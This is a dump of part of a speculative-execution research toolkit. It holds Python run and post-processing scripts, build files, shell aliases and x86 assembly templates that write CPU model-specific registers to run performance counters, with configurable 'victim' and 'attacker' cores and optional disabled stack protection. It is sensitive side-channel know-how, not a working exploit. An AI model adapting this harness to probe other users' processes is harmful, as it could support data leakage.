conn.execute(sql) 105 | 106 | res_cycles = [] 107 | res_uops = [] 108 | 109 | for row in cycles_res: 110 | res_cycles.append(row[0]) 111 | res_uops.append(row[1]) 112 | 113 | cycle_mean = mean(res_cycles, axis=0) 114 | cycle_std = std(res_cycles, axis=0) 115 | 116 | uops_mean = mean(res_uops, axis=0) 117 | uops_std = std(res_uops, axis=0) 118 | 119 | # Delete outliers and where there was no mispredicted 120 | # branch 121 | a_clause = or_(table.c.CYCLES <= (cycle_mean - 2 * cycle_std), 122 | table.c.CYCLES >= (cycle_mean + 2 * 123 | cycle_std)).self_group() 124 | b_clause = or_(table.c[UOPS_EXECUTED] <= (uops_mean - 2 * uops_std), 125 | table.c[UOPS_EXECUTED] >= (uops_mean + 2 * uops_std)).self_group() 126 | if uops_std != 0: 127 | c_clause = or_(a_clause, b_clause).self_group() 128 | else: 129 | if cycle_std != 0: 130 | c_clause = a_clause 131 | else: 132 | c_clause = or_(False, False) 133 | 134 | 135 | d_clause = or_(c_clause, 136 | table.c["BR_MISP_RETIRED.ALL_BRANCHES"] 137 | <= 0).self_group() 138 | 139 | d = table.delete() \ 140 | .where(c_clause) 141 | 142 | res = conn.execute(d) 143 | 144 | # sel = select([table]) 145 | # res = conn.execute(sel) 146 | # fh = open(f+".csv", "wb") 147 | # outcsv = csv.writer(fh) 148 | # outcsv.writerow(res.keys()) 149 | # outcsv.writerows(res) 150 | # fh.close() 151 | 152 | final.write ("######### {} ###########\n".format(f)) 153 | first = True 154 | i = 0 155 | for clm in table.c: 156 | if first: 157 | first = False 158 | continue 159 | sql = select([clm]) 160 | res = [] 161 | 162 | sql_res = conn.execute(sql) 163 | for row in sql_res: 164 | res.append(row[0]) 165 | 166 | final.write("{}: average: {}, std deviation: {}\n" 167 | .format(categories[i], 168 | average(res), 169 | std(res) 170 | ) 171 | ) 172 | i = i+1 173 | final.write ("---------------------------------------------------------\n") 174 | table.drop(engine) 175 | 176 | except IOError as e: 177 | print ("{}".format(e)) 178 | exit(-1) 179 | 180 | 181 | if __name__ == "__main__": 182 | main() 183 | -------------------------------------------------------------------------------- /scripts/run_test.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # Copyright 2021 IBM Corporation 4 | # 5 | # Licensed under the Apache License, Version 2.0 (the "License"); 6 | # you may not use this file except in compliance with the License. 7 | # You may obtain a copy of the License at 8 | # 9 | # http://www.apache.org/licenses/LICENSE-2.0 10 | # 11 | # Unless required by applicable law or agreed to in writing, software 12 | # distributed under the License is distributed on an "AS IS" BASIS, 13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | # See the License for the specific language governing permissions and 15 | # limitations under the License. 16 | 17 | import os 18 | import argparse 19 | import subprocess 20 | import multiprocessing 21 | 22 | def main(): 23 | parser = argparse.ArgumentParser() 24 | parser.add_argument('projectpath', help='Test base path where tests are looked \ 25 | for') 26 | parser.add_argument('--repeat', '-r', help='Number of repeatition', 27 | default=10000, type=int) 28 | parser.add_argument('--cleanup', '-c', help='Cleanup result folder', 29 | action='store_true') 30 | 31 | args = parser.parse_args() 32 | 33 | os.system("taskset -pc {} {}".format(multiprocessing.cpu_count() -1, os.getpid())) 34 | 35 | if args.cleanup: 36 | print ("Cleaning up results folder as requested\n") 37 | for dirname,_,filenames in os.walk(os.path.join(args.projectpath,"results")): 38 | for f in filenames: 39 | print("Deleting {}".format(os.path.join(dirname, f))) 40 | os.remove(os.path.join(dirname, f)) 41 | i = 0 42 | for dirname,_, filenames in os.walk(os.path.join(args.projectpath,"tests")): 43 | for binname in filenames: 44 | temp_path = os.path.join(args.projectpath, "results") 45 | results_path = os.path.join(temp_path, binname) 46 | spec_mon = os.path.join(args.projectpath, "speculator_mon") 47 | j = 0 48 | 49 | while (os.path.isfile(results_path)): 50 | results_path = os.path.join(temp_path, binname+"_"+str(j)) 51 | j = j + 1 52 | 53 | exec_path = os.path.join(dirname, binname) 54 | if not os.access(exec_path, os.X_OK): 55 | continue 56 | try: 57 | proc = subprocess.Popen([spec_mon, '-r', 58 | str(args.repeat), 59 | '-o', results_path, 60 | '-v', exec_path], 61 | stdout=subprocess.PIPE) 62 | except OSError: 63 | print("Error during the call of speculator_mon, double check the " \ 64 | "file location") 65 | exit(-1) 66 | i = i + 1 67 | proc.communicate() 68 | print ("{}) Execution of {} terminated.\n" \ 69 | "Results written at {}\n".format(i,binname, results_path)) 70 | 71 | print ("Finished.\n") 72 | 73 | if __name__ == '__main__': 74 | main() 75 | -------------------------------------------------------------------------------- /speculator.env: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | # SPEC_H points to the main folder of speculator 16 | export SPEC_H="$HOME/speculator" 17 | 18 | # SPEC_B points to the build directory 19 | export SPEC_B="$HOME/speculator_build" 20 | 21 | # SPEC_I points to the install directory 22 | export SPEC_I="$HOME/speculator_install" 23 | 24 | alias speculator="sudo --preserve-env=SPEC_I \ 25 | --preserve-env=SPEC_B \ 26 | --preserve-env=SPEC_H \ 27 | $SPEC_I/speculator_mon" 28 | 29 | alias spec_configure="cmake $SPEC_H -B$SPEC_B -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=$SPEC_I" 30 | 31 | alias spec_build_ninja="ninja -C $SPEC_B install" 32 | 33 | alias spec_build_make="make -C $SPEC_B install" 34 | 35 | alias spec_cleanup_install="rm -rf $SPEC_I/*" 36 | alias spec_cleanup_build="rm -rf $SPEC_B/*" 37 | alias spec_cleanup_all="spec_cleanup_build && spec_cleanup_install" 38 | 39 | alias spec_all="spec_configure && spec_build_make" 40 | alias spec_all_ninja="spec_configure -G \"Ninja\" && spec_build_ninja" 41 | alias spec_run_all="sudo --preserve-env=SPEC_I \ 42 | --preserve-env=SPEC_B \ 43 | --preserve-env=SPEC_H $SPEC_I/scripts/run_test.py" 44 | 45 | alias spec_aggregate="$SPEC_I/scripts/post-processing.py -l $SPEC_I/results" 46 | -------------------------------------------------------------------------------- /src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | cmake_minimum_required (VERSION 3.1) 16 | 17 | # Define speculator_mon executable target 18 | add_executable (speculator_mon speculator_monitor.c) 19 | 20 | target_include_directories(speculator_mon PRIVATE ${CMAKE_BINARY_DIR}) 21 | 22 | IF (${VENDOR} STREQUAL "AuthenticAMD") 23 | target_compile_definitions(speculator_mon PRIVATE AMD) 24 | ELSEIF (${VENDOR} STREQUAL "GenuineIntel") 25 | target_compile_definitions(speculator_mon PRIVATE INTEL) 26 | ENDIF() 27 | 28 | # Add link options for speculator_mon 29 | target_link_libraries(speculator_mon json-c pfm pthread) 30 | 31 | target_compile_options(speculator_mon PRIVATE "-Wall") 32 | target_compile_options(speculator_mon PRIVATE "-Werror") 33 | target_compile_options(speculator_mon PRIVATE "--pedantic-errors") 34 | 35 | set_property(TARGET speculator_mon PROPERTY C_STANDARD 11) 36 | 37 | #### DEBUG OPTION 38 | IF (DEBUG) 39 | message(STATUS "Debug Mode ON") 40 | unset(DEBUG CACHE) 41 | target_compile_definitions(speculator_mon PRIVATE DEBUG) 42 | ELSE() 43 | message(STATUS "Debug Mode OFF") 44 | unset(DEBUG CACHE) 45 | ENDIF() 46 | #### 47 | 48 | #### DUMMY OPTION 49 | IF (DUMMY) 50 | message(STATUS "Dummy Load Mode ON -- " ${DUMMY}) 51 | target_compile_definitions(speculator_mon PRIVATE DUMMY) 52 | set(DUMMY_NAME ${DUMMY}) 53 | unset(DUMMY CACHE) 54 | ELSE() 55 | message(STATUS "Dummy Load Mode OFF") 56 | unset(DUMMY CACHE) 57 | ENDIF() 58 | #### 59 | 60 | #### VICTIM 61 | IF (VICTIM) 62 | message(STATUS "Victim specified core -- " ${VICTIM}) 63 | set(VICTIM_CORE ${VICTIM}) 64 | unset(VICTIM CACHE) 65 | ELSE() 66 | message(STATUS "Victim core set to default -- " 0) 67 | set(VICTIM_CORE 0) 68 | unset(VICTIM CACHE) 69 | ENDIF() 70 | #### 71 | 72 | #### ATTACKER 73 | IF (ATTACKER) 74 | message(STATUS "Attacker specified core -- " ${ATTACKER}) 75 | set(ATTACKER_CORE ${ATTACKER}) 76 | unset(ATTACKER CACHE) 77 | ELSE() 78 | message(STATUS "Attacker core set to default -- " 4) 79 | set(ATTACKER_CORE 4) 80 | unset(ATTACKER CACHE) 81 | ENDIF() 82 | #### 83 | 84 | 85 | install(TARGETS speculator_mon 86 | RUNTIME DESTINATION . ) 87 | 88 | configure_file (${CMAKE_SOURCE_DIR}/include/config.h.in ${CMAKE_BINARY_DIR}/config.h) 89 | configure_file (${CMAKE_SOURCE_DIR}/tests/common.inc.in ${CMAKE_SOURCE_DIR}/tests/common.inc) 90 | unset(DUMMY_NAME CACHE) 91 | unset(VICTIM_CORE CACHE) 92 | unset(ATTACKER_CORE CACHE) 93 | -------------------------------------------------------------------------------- /templates/x86/example.json: -------------------------------------------------------------------------------- 1 | { 2 | "DATA": [ 3 | "something: dq 0", 4 | "something2: dq 0" 5 | ], 6 | 7 | "INST": [ 8 | "xor eax, eax", 9 | "xor eax, eax", 10 | "xor eax, eax", 11 | "xor eax, eax", 12 | "xor eax, eax", 13 | "xor eax, eax", 14 | "xor eax, eax", 15 | "xor eax, eax", 16 | "xor eax, eax", 17 | "xor eax, eax", 18 | "xor eax, eax", 19 | "xor eax, eax", 20 | "xor eax, eax", 21 | "xor eax, eax", 22 | "xor eax, eax", 23 | "xor eax, eax", 24 | "xor eax, eax", 25 | "xor eax, eax", 26 | "xor eax, eax" 27 | ] 28 | } 29 | -------------------------------------------------------------------------------- /templates/x86/template.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | offset: dq 0 25 | val: dq 0 26 | len: equ $-val 27 | array: resb 128 28 | warmup_cnt: dd 11 29 | ;##### DATA STARTS HERE ######## 30 | 31 | ;##### DATA ENDS HERE ######## 32 | 33 | section .text 34 | global perf_test_entry:function 35 | global snippet:function 36 | 37 | perf_test_entry: 38 | push rbp 39 | mov rbp, rsp 40 | sub rsp, len 41 | 42 | check_pinning VICTIM_PROCESS 43 | ;check_pinning ATTACKER_PROCESS 44 | msr_open 45 | msr_seek 46 | 47 | reset_counter 48 | start_counter 49 | 50 | ;##### SNIPPET STARTS HERE ###### 51 | 52 | ;##### SNIPPET ENDS HERE ###### 53 | 54 | stop_counter 55 | 56 | msr_close 57 | exit 0 58 | 59 | -------------------------------------------------------------------------------- /templates/x86/template_branch.asm: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | [BITS 64] 16 | %include "common.inc" 17 | %include "pmc.inc" 18 | 19 | section .data 20 | 21 | dev_file: db '/dev/cpu/',VICTIM_PROCESS_STR,'/msr',0 22 | ;dev_file: db '/dev/cpu/',ATTACKER_PROCESS_STR,'/msr',0 23 | fd: dq 0 24 | warmup_cnt_fake: dd 1 25 | offset: dq 0 26 | val: dq 0 27 | len: equ $-val 28 | array: resb 128 29 | warmup_cnt: dd 1 30 | ;##### DATA STARTS HERE ######## 31 | 32 | ;##### DATA ENDS HERE ######## 33 | 34 | section .text 35 | global perf_test_entry:function 36 | global snippet:function 37 | 38 | perf_test_entry: 39 | push rbp 40 | mov rbp, rsp 41 | sub rsp, len 42 | 43 | check_pinning VICTIM_PROCESS 44 | ;check_pinning ATTACKER_PROCESS 45 | msr_open 46 | msr_seek 47 | .data: 48 | clflush [warmup_cnt] 49 | mov eax, 0 50 | cpuid 51 | lfence 52 | reset_counter 53 | start_counter 54 | mov ebx, DWORD[warmup_cnt] 55 | cmp ebx, 12 56 | je .else 57 | ;##### SNIPPET STARTS HERE ###### 58 | 59 | ;##### SNIPPET ENDS HERE ###### 60 | mov ebx, DWORD[warmup_cnt_fake] 61 | cmp ebx, 12 62 | je .else 63 | lfence 64 | .else: 65 | lfence 66 | stop_counter 67 | 68 | inc DWORD[warmup_cnt] 69 | cmp DWORD[warmup_cnt], 13 70 | jl .data 71 | 72 | msr_close 73 | exit 0 74 | -------------------------------------------------------------------------------- /tests/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | # Copyright 2021 IBM Corporation 2 | # 3 | # Licensed under the Apache License, Version 2.0 (the "License"); 4 | # you may not use this file except in compliance with the License. 5 | # You may obtain a copy of the License at 6 | # 7 | # http://www.apache.org/licenses/LICENSE-2.0 8 | # 9 | # Unless required by applicable law or agreed to in writing, software 10 | # distributed under the License is distributed on an "AS IS" BASIS, 11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | # See the License for the specific language governing permissions and 13 | # limitations under the License. 14 | 15 | cmake_minimum_required (VERSION 2.6) 16 | 17 | enable_language(ASM_NASM) 18 | if (CMAKE_ASM_NASM_COMPILER_LOADED) 19 | set(CAN_USE_ASSEMBLER TRUE) 20 | endif(CMAKE_ASM_NASM_COMPILER_LOADED) 21 | 22 | # Information for libc 23 | set(LIBC 24 | ${CMAKE_CURRENT_SOURCE_DIR}/musl/libc.a) 25 | 26 | set(LIBCDYN 27 | ${CMAKE_CURRENT_SOURCE_DIR}/musl/libc.so) 28 | 29 | # Look for .asm file inside the asm folder 30 | file(GLOB_RECURSE asmFiles RELATIVE ${CMAKE_CURRENT_SOURCE_DIR} 31 | ${CMAKE_CURRENT_SOURCE_DIR}/*.asm) 32 | 33 | list(LENGTH asmFiles asmFilesN) 34 | message(STATUS "Found ${asmFilesN} asm files") 35 | 36 | file(GLOB_RECURSE allcFiles RELATIVE ${CMAKE_CURRENT_SOURCE_DIR} 37 | ${CMAKE_CURRENT_SOURCE_DIR}/*.c) 38 | 39 | list(LENGTH allcFiles allcFilesN) 40 | message(STATUS "Found ${allcFilesN} c files") 41 | 42 | add_compile_options(-I ${CMAKE_CURRENT_SOURCE_DIR}/ ) 43 | 44 | 45 | # Set compiler flags to remove optimizations 46 | set (CMAKE_C_FLAGS ${CMAKE_C_FLAGS} -O0) 47 | 48 | # For each .asm file and possible .c respectively, compile and link them together 49 | # in different targets 50 | # NOTE .asm and .c file should have the same name 51 | foreach (asmFileName ${asmFiles}) 52 | string(REPLACE ".asm" ".c" cFileName ${asmFileName}) 53 | string(REPLACE ".asm" "" DirName ${asmFileName}) 54 | string(REGEX REPLACE ".*/" "" TargetName ${DirName}) 55 | 56 | set_source_files_properties(${asmFileName} PROPERTIES COMPILE_FLAGS 57 | "-f elf64") 58 | 59 | 60 | if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/${cFileName}) 61 | message (STATUS "Found test " ${asmFileName} " " ${cFileName}) 62 | 63 | list (REMOVE_ITEM allcFiles ${cFileName}) 64 | 65 | if (CANARY) 66 | add_executable(${TargetName} ${asmFileName} ${LIBCDYN} ${cFileName}) 67 | message("\tSetting full stack protection") 68 | set_source_files_properties(${cFileName} PROPERTIES COMPILE_FLAGS 69 | "-fstack-protector-all") 70 | else() 71 | message("\tNO full stack protection") 72 | add_executable(${TargetName} ${asmFileName} ${LIBC} ${cFileName}) 73 | set_source_files_properties(${cFileName} PROPERTIES COMPILE_FLAGS 74 | "-fno-stack-protector") 75 | endif() 76 | 77 | else() 78 | message (STATUS "Found test " ${asmFileName}) 79 | add_executable(${TargetName} ${asmFileName} ${LIBC}) 80 | set_target_properties(${TargetName} PROPERTIES LINKER_LANGUAGE "C" ) 81 | endif() 82 | 83 | set_property(TARGET ${TargetName} PROPERTY C_STANDARD 11) 84 | 85 | if (NOT CANARY) 86 | message("\tlinking with libc.a") 87 | target_link_libraries(${TargetName} -lrt -static -nostartfiles -nostdlib 88 | -fno-asynchronous-unwind-tables -fno-exceptions -Wl,-eperf_test_entry 89 | -Wl,--build-id=none -Wl,--as-needed ${LIBC}) 90 | else () 91 | message("\tlinking with libc.so") 92 | target_link_libraries(${TargetName} -lrt -nostartfiles -no-pie -Wl,-eperf_test_entry) 93 | endif() 94 | 95 | # Set target installation 96 | install(TARGETS ${TargetName} 97 | RUNTIME DESTINATION tests/${DirName}) 98 | endforeach(asmFileName) 99 | 100 | # Scan .c files and compile them as separate targets 101 | foreach (cFileName ${allcFiles}) 102 | message(STATUS "Found test " ${cFileName}) 103 | string(REPLACE ".c" "" DirName ${cFileName}) 104 | string(REGEX REPLACE ".*/" "" TargetName ${DirName}) 105 | 106 | add_executable(${TargetName} ${cFileName}) 107 | set_target_properties(${TargetName} PROPERTIES C_STANDARD 11) 108 | install(TARGETS ${TargetName} 109 | RUNTIME DESTINATION tests/${DirName}) 110 | endforeach(cFileName) 111 | -------------------------------------------------------------------------------- /tests/include/x86/amd.inc: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | %macro reset_counter 0 16 | mov rax, SYS_GETUID 17 | syscall 18 | cmp rax, 0 19 | jne %%.skip 20 | mov rcx, 4 21 | %%.reset_pr_counters: 22 | push rcx 23 | mov rax, SYS_PWRITE64 24 | mov rdi, [fd] 25 | mov QWORD[val], 0 26 | mov rsi, val 27 | mov rdx, len 28 | mov r10, 0xc0010004 ; offset - PerfCtr0 + loop iterator 29 | add r10, rcx 30 | sub r10, 1 31 | syscall 32 | pop rcx 33 | loopnz %%.reset_pr_counters 34 | %%.skip: 35 | %endmacro 36 | 37 | %macro msr_seek 0 38 | %endmacro 39 | 40 | %macro start_counter 0 41 | %endmacro 42 | 43 | %macro stop_counter 0 44 | %endmacro 45 | 46 | ; don't use this, just reset counters 47 | %macro save_mask_unused 0 48 | mov rcx, 4 49 | %%.read_eventsel: 50 | push rcx 51 | mov rax, SYS_PREAD64 52 | mov rdi, [fd] ; fd 53 | mov rsi, val 54 | mov rdx, len 55 | mov r10, 0xc0010000; offset - PerfSel0 + loop iterator 56 | add r10, rcx 57 | sub r10, 1 58 | syscall 59 | pop rcx 60 | mov r8, rcx 61 | sub r8, 1 62 | imul r8, len 63 | add r8, sel 64 | mov QWORD[r8], rax 65 | loopnz %%.read_eventsel 66 | 67 | %endmacro 68 | 69 | ; don't use this, just reset counters 70 | %macro start_counter_unused 0 71 | mov rcx, 4 72 | %%.enable_counters: 73 | push rcx 74 | mov rax, SYS_PWRITE64 75 | mov rdi, [fd] 76 | mov r8, rcx 77 | sub r8, 1 78 | imul r8, len 79 | add r8, sel 80 | or QWORD[r8], 0x400000 ; PERF_EN 81 | mov rsi, r8 82 | mov rdx, len 83 | mov r10, 0xc0010000 ; offset - PerfSel0 + loop iterator 84 | add r10, rcx 85 | sub r10, 1 86 | syscall 87 | pop rcx 88 | loopnz %%.enable_counters 89 | 90 | %endmacro 91 | 92 | ; don't use this, just reset counters 93 | %macro stop_counter_unused 0 94 | mov rcx, 4 95 | %%.disable_counters: 96 | push rcx 97 | mov rax, SYS_PWRITE64 98 | mov rdi, [fd] 99 | mov r8, rcx 100 | sub r8, 1 101 | imul r8, len 102 | add r8, sel 103 | and QWORD[r8], ~0x400000 ; PERF_EN 104 | mov rsi, r8 105 | mov rdx, len 106 | mov r10, 0xc0010000 ; offset - PerfSel0 + loop iterator 107 | add r10, rcx 108 | sub r10, 1 109 | syscall 110 | pop rcx 111 | loopnz %%.disable_counters 112 | %endmacro 113 | -------------------------------------------------------------------------------- /tests/include/x86/common.inc.in: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | %define SYS_EXIT 60 16 | %define SYS_WRITE 1 17 | %define SYS_OPEN 2 18 | %define SYS_CLOSE 3 19 | %define SYS_LSEEK 8 20 | %define SYS_GETCPU 309 21 | %define SYS_PREAD64 17 22 | %define SYS_PWRITE64 18 23 | %define SYS_GETUID 102 24 | %define SYS_RT_SIGACTION 13 25 | %define SYS_RT_SIGRETURN 15 26 | %define VICTIM_PROCESS @VICTIM_CORE@ 27 | %define ATTACKER_PROCESS @ATTACKER_CORE@ 28 | %define VICTIM_PROCESS_STR "@VICTIM_CORE@" 29 | %define ATTACKER_PROCESS_STR "@ATTACKER_CORE@" 30 | 31 | %macro check_pinning 1 32 | %%.pinning: 33 | mov rax, SYS_GETCPU 34 | mov rdi, val 35 | xor rsi, rsi 36 | xor rdx, rdx 37 | syscall 38 | mov rax, [val] 39 | cmp rax, %1 40 | jne %%.pinning 41 | %endmacro 42 | 43 | %macro msr_open 0 44 | mov rax, SYS_OPEN 45 | mov rdi, dev_file ; /dev/cpu/0/msr 46 | mov rsi, 0x0002 ; O_RDWR 47 | mov rdx, 600o ; read-write 48 | syscall 49 | 50 | mov [fd], eax ; storing fd for further use 51 | %endmacro 52 | 53 | %macro msr_close 0 54 | mov rax, SYS_CLOSE 55 | mov rdi, [fd] 56 | syscall 57 | %endmacro 58 | 59 | %macro exit 1 60 | mov rax, SYS_EXIT 61 | mov rdi, %1 62 | syscall 63 | %endmacro 64 | 65 | ; print *mem, len 66 | %macro print 2 67 | push rdx 68 | push rax 69 | push rsi 70 | mov rax, SYS_WRITE 71 | mov rdi, 1 ; stdout 72 | mov rsi, %1 73 | mov rdx, %2 ;len 74 | syscall 75 | pop rsi 76 | pop rax 77 | pop rdx 78 | %endmacro 79 | 80 | 81 | ; copy: dst, src, len 82 | %macro copy 3 83 | push rcx 84 | push rbx 85 | mov rcx, %3 86 | %%.copy: 87 | mov bl, [%2+rcx-1] 88 | mov [%1+rcx-1], bl 89 | loop %%.copy 90 | pop rbx 91 | pop rcx 92 | %endmacro 93 | 94 | %macro pipeline_flush 0 95 | mov rax, 0 96 | cpuid 97 | lfence 98 | %endmacro 99 | 100 | ; sys_rt_sigaction - alter an action taken by a process 101 | ; @sig: signal to be sent 102 | ; @act: new sigaction 103 | ; @oact: used to save the previous sigaction 104 | ; @sigsetsize: size of sigset_t type 105 | %macro setup_signal_handler 1 106 | mov QWORD [sigaction.sa_handler], signal_handler 107 | mov QWORD [sigaction.sa_restorer], signal_restorer 108 | mov eax, SA_RESTART | SA_RESTORER | SA_SIGINFO 109 | mov DWORD [sigaction.sa_flags], eax 110 | mov rax, SYS_RT_SIGACTION ; system call number 111 | mov rdi, %1 ; signal number 112 | lea rsi, [sigaction] ; sigaction struct 113 | xor rdx, rdx ; save previous sigaction (no) 114 | mov r10, NSIG_WORDS ; sigsetsize 115 | syscall 116 | cmp eax, 0 117 | %endmacro 118 | 119 | -------------------------------------------------------------------------------- /tests/include/x86/intel.inc: -------------------------------------------------------------------------------- 1 | ; Copyright 2021 IBM Corporation 2 | ; 3 | ; Licensed under the Apache License, Version 2.0 (the "License"); 4 | ; you may not use this file except in compliance with the License. 5 | ; You may obtain a copy of the License at 6 | ; 7 | ; http://www.apache.org/licenses/LICENSE-2.0 8 | ; 9 | ; Unless required by applicable law or agreed to in writing, software 10 | ; distributed under the License is distributed on an "AS IS" BASIS, 11 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | ; See the License for the specific language governing permissions and 13 | ; limitations under the License. 14 | 15 | %macro msr_seek 0 16 | mov rax, SYS_GETUID 17 | syscall 18 | cmp rax, 0 19 | jne %%.skip 20 | mov rax, SYS_LSEEK 21 | mov rdi, [fd] ; fd 22 | mov rsi, 0x38F ; offset 23 | mov rdx, 0 ;SEEK_SET 24 | syscall 25 | %%.skip: 26 | %endmacro 27 | 28 | %macro reset_counter 0 29 | mov rax, SYS_GETUID 30 | syscall 31 | cmp rax, 0 32 | jne %%.skip 33 | mov rcx, 8 34 | %%.reset_pr_counters: 35 | push rcx 36 | mov rax, SYS_PWRITE64 37 | mov rdi, [fd] 38 | mov QWORD[val], 0 39 | mov rsi, val 40 | mov rdx, len 41 | mov r10, 0xC1 42 | add r10, rcx 43 | sub r10, 1 44 | syscall 45 | pop rcx 46 | loopnz %%.reset_pr_counters 47 | 48 | mov rcx, 3 49 | %%.reset_fx_counters: 50 | push rcx 51 | mov rax, SYS_PWRITE64 52 | mov rdi, [fd] 53 | mov QWORD[val], 0 54 | mov rsi, val 55 | mov rdx, len 56 | mov r10, 0x309 57 | add r10, rcx 58 | sub r10, 1 59 | syscall 60 | pop rcx 61 | loopnz %%.reset_fx_counters 62 | %%.skip: 63 | %endmacro 64 | 65 | %macro start_counter 0 66 | mov rax, SYS_GETUID 67 | syscall 68 | cmp rax, 0 69 | jne %%.skip 70 | mov rax, SYS_WRITE 71 | mov rdi, [fd] ; fd 72 | mov QWORD[val], 7 ; 15 | (7 << 32) 73 | shl QWORD[val], 32 74 | or QWORD[val], 15 75 | 76 | mov rsi, val 77 | mov rdx, len ;len 78 | syscall 79 | %%.skip: 80 | %endmacro 81 | 82 | %macro stop_counter 0 83 | mov rax, SYS_GETUID 84 | syscall 85 | cmp rax, 0 86 | jne %%.skip 87 | mov rdi, [fd] 88 | mov rsi, val 89 | mov rdx, len 90 | mov rax, SYS_WRITE 91 | mov QWORD[val], 0 92 | syscall 93 | %%.skip: 94 | %endmacro 95 | 96 | %macro jmpnext 0 97 | cmp rax, rax 98 | jle %%.label 99 | %%.label: 100 | %endmacro 101 | 102 | %macro jmpnext2 0 103 | jmpnext 104 | jmpnext 105 | %endmacro 106 | 107 | %macro jmpnext4 0 108 | jmpnext2 109 | jmpnext2 110 | %endmacro 111 | 112 | %macro jmpnext8 0 113 | jmpnext4 114 | jmpnext4 115 | %endmacro 116 | 117 | %macro jmpnext16 0 118 | jmpnext8 119 | jmpnext8 120 | %endmacro 121 | 122 | %macro jmpnext32 0 123 | jmpnext16 124 | jmpnext16 125 | %endmacro 126 | 127 | %macro jmpnext64 0 128 | jmpnext32 129 | jmpnext32 130 | %endmacro 131 | 132 | %macro jmpnext128 0 133 | jmpnext64 134 | jmpnext64 135 | %endmacro 136 | 137 | %macro jmpnext256 0 138 | jmpnext128 139 | jmpnext128 140 | %endmacro 141 | 142 | %macro callnext 0 143 | call %%.label 144 | ret 145 | %%.label: 146 | %endmacro 147 | 148 | %macro pushret 0 149 | push %%.label 150 | clflush[rsp] 151 | mfence 152 | ret 153 | %%.label: 154 | %endmacro 155 | 156 | -------------------------------------------------------------------------------- /tests/musl/libc.a: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibm-research/speculator/b8416a5756d2bc3f9fe515a34e0196bd51373a99/tests/musl/libc.a -------------------------------------------------------------------------------- /tests/musl/libc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ibm-research/speculator/b8416a5756d2bc3f9fe515a34e0196bd51373a99/tests/musl/libc.so -------------------------------------------------------------------------------- /tests/musl/libcrypt.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libdl.a: -------------------------------------------------------------------------------- 1 | ! 2 | -------------------------------------------------------------------------------- /tests/musl/libm.a: 